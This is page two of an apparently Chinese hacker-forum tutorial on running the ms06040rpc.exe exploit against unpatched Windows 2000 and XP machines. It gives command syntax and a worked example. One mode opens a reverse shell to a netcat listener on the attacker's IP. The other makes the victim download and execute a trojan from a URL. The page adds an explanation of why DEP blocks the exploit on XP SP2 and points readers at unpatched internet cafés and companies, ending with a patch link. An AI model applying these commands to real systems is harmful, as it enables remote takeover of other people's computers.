照顾一下小菜，我这说明一下
方法一：
命令：ms06040rpc.exe  攻击的IP   你的IP   反弹端口 系统类型
系统类型：“1”就是win 2000sp4
“2”就是winxpsp1
举例：ms06040rpc.exe 192.168.209.128 192.168.137.1 8888 1
方法二
命令：ms06040rpc.exe 你的木马地址系统类型
举例：ms06040rpc.exe  192.168.209.128 http://www.hackbase.com/muma.exe 1
溢出成功后就自动下载http://www.hackbase.com/muma.exe 并且执行


我们这输入ms06040rpc.exe 192.168.209.128 192.168.137.1 8888 1
192.168.209.128就是我要攻击的IP，192.168.137.1就是我的IP，8888就是我刚才用Nc监听的8888端口


提示发送成功


OK，我们的得到了一个SHELL，可以随心的控制他了

很多人，包括一些大虾们都弄不懂为什么明明XPSP2和2003系统明明说了有漏洞可是不能利用
呵呵，告诉大家，其实XPSP2用了DEP技术

因为DEP能够对各种程序进行监视，阻止病毒在受保护的内存位置运行有害代码。DEP通过处理器的NX(No eXecute)功能，查找内存中没有明确包含可执行代码的数据(这些数据有时会是病毒的源代码)，找到这些数据后，NX将它们都标记为“不可执行”。以后如果某程序在内存中，试图执行这些带“不可执行”标记的代码，SP2将会自动关闭该程序。因此，假如你运行了一个已经染毒的软件，DEP就会把病毒代码标记为“不可执行”，这样就能阻止病毒在内存中运行，保护电脑中的文件免受蠕虫、病毒的传染破坏。

很多朋友犯迷糊了
打个比方就是系统给每个合法的应用程序发一张名片，但是溢出程序的原理没有名片，就不能执行
明白了吧，哈哈

很多网吧，很多大公司都有没打补丁
请大家小心利用。JUST FOR FUN!
危害这么大，大家赶快下载补丁吧：
http://www.microsoft.com/china/t ... letin/ms06-040.mspx

上一页  [1] [2]